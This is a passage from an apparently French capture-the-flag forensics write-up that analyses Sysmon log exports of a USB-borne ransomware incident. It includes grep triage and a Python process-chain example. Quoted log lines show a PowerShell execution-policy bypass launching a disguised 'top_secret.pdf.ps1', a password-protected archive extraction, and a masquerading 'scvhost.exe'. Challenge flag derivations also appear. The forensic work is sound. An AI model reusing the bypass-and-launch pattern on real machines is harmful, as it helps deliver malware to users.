class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,<span class="s2">"HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices\SWD#WPDBUSENUM#_??_USBSTOR#DISK&amp;VEN_GENERIC&amp;PROD_FLASH_DISK&amp;REV_8.07#801257DC&amp;0#{53F56307-B6BF-11D0-94F2-00A0C91EFB8B}\FriendlyName"</span>,,,<span class="s2">"13"</span>,<span class="s2">"5048"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:55.992"</span>,<span class="s2">"2"</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ echo -n "MONEY" | sha1sum | sed -E 's/^([0-9a-f]{40}).*/ECW{\1}/'
ECW{6bf...723}
</code></pre></div>
<h1>Name of the file opened</h1>
<p>Here we first looked up which drive letter was assigned to the USB key's volume, via the <code>SYSTEM\MountedDevices</code> key.</p>
<p>As before, we look for an entry in which the registry value is set, not created:</p>
<div class="highlight"><pre><span></span><code>$ grep <span class="s1">'Registry value set.*SYSTEM\\MountedDevices'</span> logs.csv
<span class="s2">"2019-09-27T08:26:53.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,,,<span class="s2">"Binary Data"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:54"</span>,<span class="s2">"INFO"</span>,,<span class="s2">"01DNRX93QCFM8D8B11JSRZR611"</span>,,,,<span class="s2">"System"</span>,,,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,,,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,<span class="s2">"{6b71f96b-c4b3-5d8d-0000-0010eb030000}"</span>,<span class="s2">"3252"</span>,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"503173"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,<span class="s2">"HKLM\SYSTEM\MountedDevices\\??\Volume{b04458c0-e0fe-11e9-b06f-0050569a0156}"</span>,,,<span class="s2">"13"</span>,,<span class="s2">"5048"</span>,,,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:53.614"</span>,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:26:53.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,,,<span class="s2">"Binary Data"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:54"</span>,<span class="s2">"INFO"</span>,,<span class="s2">"01DNRX93QD2F3WF54V03YCEZCF"</span>,,,,<span class="s2">"System"</span>,,,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,,,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,<span class="s2">"{6b71f96b-c4b3-5d8d-0000-0010eb030000}"</span>,<span class="s2">"3252"</span>,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"503175"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,<span class="s2">"HKLM\SYSTEM\MountedDevices\\DosDevices\E:"</span>,,,<span class="s2">"13"</span>,,<span class="s2">"5048"</span>,,,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:53.614"</span>,<span class="s2">"2"</span>
</code></pre></div>
<p>From there, we looked for the various processes created that involved a file stored on the USB key.</p>
<p>For that, we use grep again, this time with a regex:</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Process Create.*E:\\[a-zA-Z0-9_-]{1,15}\.[a-zA-Z0-9]{1,4}'</span> logs.csv
<span class="s2">"2019-09-27T08:28:01.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&amp; 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Windows PowerShell<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:02<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXB6012401ETD2VY33ZBRB<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5<span class="o">=</span>7353F60B1739074EB17C5F4DDDEFE239,SHA256<span class="o">=</span>DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH<span class="o">=</span>741776AACCFC5B71FF59832DCDCACE0F<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 
<span class="m">08</span>:28:01.639<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>PowerShell.EXE<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c811-5d8d-0000-00105ae93600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">510624</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span 
class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:12.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>?<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"?"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:13"</span>,<span class="s2">"INFO"</span>,<span class="s2">"?"</span>,<span class="s2">"01DNRXBGJ64GV4QYSY9QHDF8Q6"</span>,,,<span class="s2">"SHA1=AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5=79F0ED40895935BFF57D763B63B77DA2,SHA256=F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH=FC40519AF20116C903E3FF836E366E39"</span>,<span class="s2">"E:\scvhost.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:12.226\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"?"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"E:\scvhost.exe"</span>,<span class="s2">"{6b71f96b-c81b-5d8d-0000-0010ed433700}"</span>,<span class="s2">"8312"</span>,,<span class="s2">"{6b71f96b-c81c-5d8d-0000-0010e1493700}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"?"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"511750"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span 
class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:12.226"</span>,<span class="s2">"5"</span>
<span class="o">[</span>...<span class="o">]</span>
<span class="s2">"2019-09-27T08:28:11.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBFGMQ28DXDKZ2H3KNJJE<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span 
class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511649</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:29:12.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\N</span>OTEPAD.EXE<span class="s2">""</span> E:<span class="se">\p</span>s.txt<span class="s2">","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Notepad"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:29:12"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXDADQ72NPK4NJ0BMXX21V"</span>,,,<span class="s2">"SHA1=60733DE225B5C4BFC42FB79E5D1A4F6683243E4A,MD5=782877B30735ABD1EAE241F13145F664,SHA256=E46B3CA5A0EBB4A6979F852F50E22BD08C9F2D0206CC04383978BE0172AC88EE,IMPHASH=C8922BE3DCDFEB5994C9EEE7745DC22E"</span>,<span class="s2">"C:\Windows\System32\notepad.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:29:12.216\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"NOTEPAD.EXE"</span>,<span class="s2">"C:\Windows\Explorer.EXE"</span>,<span class="s2">"C:\Windows\explorer.exe"</span>,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"5320"</span>,,<span class="s2">"{6b71f96b-c858-5d8d-0000-00109a9c4000}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating 
System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"534488"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:29:12.216"</span>,<span class="s2">"5"</span>
</code></pre></div>
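<p>The same triage as the grep above, and the later step of listing the processes spawned by the script, done programmatically on the parsed CSV rather than on raw lines. This is an added example, not code from the writeup: it works on a constructed mini-CSV with a reduced header (the real NXLog export has many more, mostly unnamed columns) and placeholder process GUIDs, and the function names are ours. It goes one step beyond the grep by walking <code>ParentProcessGuid</code> up to the topmost ancestor that still references the drive, which is how you get from a noisy hit such as <code>conhost.exe</code> back to the file the user actually launched from the key.</p>

```python
import csv
import io
import re

# Constructed mini-CSV in the spirit of the Sysmon/NXLog export grepped above.
# Only the columns this example needs are kept; the GUIDs are placeholders.
SAMPLE_CSV = r'''UtcTime,EventID,ProcessGuid,Image,CommandLine,CurrentDirectory,ParentProcessGuid,ParentImage,ParentCommandLine
2019-09-27 08:27:30.000,1,{guid-calc},C:\Windows\System32\calc.exe,"""C:\Windows\System32\calc.exe""",C:\Users\robert,{guid-explorer},C:\Windows\explorer.exe,C:\Windows\Explorer.EXE
2019-09-27 08:28:00.767,1,{guid-ps1},C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'E:\top_secret.pdf.ps1'""",E:\,{guid-explorer},C:\Windows\explorer.exe,C:\Windows\Explorer.EXE
2019-09-27 08:28:00.778,1,{guid-conhost},C:\Windows\System32\conhost.exe,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows,{guid-ps1},C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'E:\top_secret.pdf.ps1'"""
2019-09-27 08:28:01.639,1,{guid-7z},C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""& 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa""",E:\,{guid-ps1},C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'E:\top_secret.pdf.ps1'"""
2019-09-27 08:28:11.717,1,{guid-scvhost},E:\scvhost.exe,"""E:\scvhost.exe""",E:\,{guid-ps1},C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'E:\top_secret.pdf.ps1'"""
2019-09-27 08:29:12.216,1,{guid-notepad},C:\Windows\System32\notepad.exe,"""C:\Windows\system32\NOTEPAD.EXE"" E:\ps.txt",E:\,{guid-explorer},C:\Windows\explorer.exe,C:\Windows\Explorer.EXE
'''


def drive_file_re(drive):
    """Regex for a file directly under the drive root, e.g. E:\\scvhost.exe.

    It stops at quotes, spaces and path separators, so the whole name
    (top_secret.pdf.ps1) is captured, where the grep regex on the page
    stops after the first extension."""
    return re.compile(re.escape(drive) + r"\\[\w.-]{1,64}")


def load_events(csv_text):
    """Parse the CSV export into one dict per event."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def own_drive_refs(ev, drive="E:"):
    """Files on `drive` referenced by the process itself (Image or CommandLine)."""
    rx = drive_file_re(drive)
    found = []
    for field in ("Image", "CommandLine"):
        for m in rx.findall(ev.get(field) or ""):
            if m not in found:
                found.append(m)
    return found


def any_drive_ref(ev, drive="E:"):
    """True if any field mentions a file on `drive`: this is what grepping the raw
    line does, and it also fires on ParentCommandLine (hence conhost.exe shows up)."""
    rx = drive_file_re(drive)
    return any(rx.search(v or "") for v in ev.values())


def removable_drive_processes(events, drive="E:"):
    """Process Create events (Sysmon EventID 1) touching `drive`, oldest first."""
    hits = [ev for ev in events if ev["EventID"] == "1" and any_drive_ref(ev, drive)]
    return sorted(hits, key=lambda ev: ev["UtcTime"])


def process_chain(events, guid):
    """Walk ProcessGuid -> ParentProcessGuid until an ancestor is missing from the log."""
    by_guid = {ev["ProcessGuid"]: ev for ev in events if ev["EventID"] == "1"}
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(by_guid[guid])
        guid = by_guid[guid]["ParentProcessGuid"]
    return chain


def origin_files(events, drive="E:"):
    """For every hit, the drive file referenced by the topmost ancestor that still
    references the drive: the thing actually launched from the key."""
    origins = set()
    for ev in removable_drive_processes(events, drive):
        refs = [own_drive_refs(a, drive) for a in process_chain(events, ev["ProcessGuid"])]
        refs = [r for r in refs if r]
        if refs:
            origins.update(refs[-1])
    return sorted(origins)


def children_of(events, parent_guid):
    """Processes spawned by `parent_guid` (the 'Process Create.*top_secret.pdf.ps1' step)."""
    kids = [ev for ev in events
            if ev["EventID"] == "1" and ev["ParentProcessGuid"] == parent_guid]
    return sorted(kids, key=lambda ev: ev["UtcTime"])


EVENTS = load_events(SAMPLE_CSV)

if __name__ == "__main__":
    for ev in removable_drive_processes(EVENTS):
        print(ev["UtcTime"], ev["CommandLine"])
    print("origin files:", origin_files(EVENTS))
    for ev in children_of(EVENTS, "{guid-ps1}"):
        print("spawned by the script host:", ev["Image"])
```

<p>On the constructed data the raw-line match returns five hits (everything but <code>calc.exe</code>), while <code>origin_files</code> collapses them to two user-launched files, <code>E:\ps.txt</code> and <code>E:\top_secret.pdf.ps1</code>; <code>children_of</code> on the script host's GUID gives the <code>conhost.exe</code>, 7-Zip and <code>scvhost.exe</code> children in time order. On the real export you would map the unnamed columns to these names first, and the same chain walk works for any drive letter.</p>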
<p>We notice a PowerShell script being launched with a <code>Set-ExecutionPolicy</code>:</p>
<div class="highlight"><pre><span></span><code>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'
</code></pre></div>
<p>So we have the name of the file that launched the ransomware: <code>top_secret.pdf.ps1</code>.</p>
<p>As before, we take the <code>sha1sum</code> of the name:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"top_secret.pdf.ps1"</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span>7d8...963<span class="o">}</span>
</code></pre></div>
<h1>Number of encrypted files</h1>
<p>We first looked at the log entries associated with the file that launched the ransomware:</p>
<div class="highlight"><pre><span></span><code>$ grep <span class="s1">'top_secret.pdf.ps1'</span> logs.csv
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"File created (rule: FileCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,<span class="s2">"2019-09-27 08:28:00.834"</span>,,,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"11"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,,<span class="s2">"01DNRXB4NXAGTKA4E73B89R1MF"</span>,,,,<span class="s2">"C:\Windows\Explorer.EXE"</span>,,,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,,,<span class="s2">"File created:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.834\\r\\nPro"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"3252"</span>,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510159"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,<span class="s2">"C:\Users\robert\AppData\Roaming\Microsoft\Windows\Recent\top_secret.pdf.ps1.lnk"</span>,,,,,<span class="s2">"11"</span>,,<span class="s2">"5048"</span>,,,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.834"</span>,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:28:01.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&amp; 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Windows PowerShell<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:02<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXB6012401ETD2VY33ZBRB<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5<span class="o">=</span>7353F60B1739074EB17C5F4DDDEFE239,SHA256<span class="o">=</span>DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH<span class="o">=</span>741776AACCFC5B71FF59832DCDCACE0F<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 
<span class="m">08</span>:28:01.639<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>PowerShell.EXE<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c811-5d8d-0000-00105ae93600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span 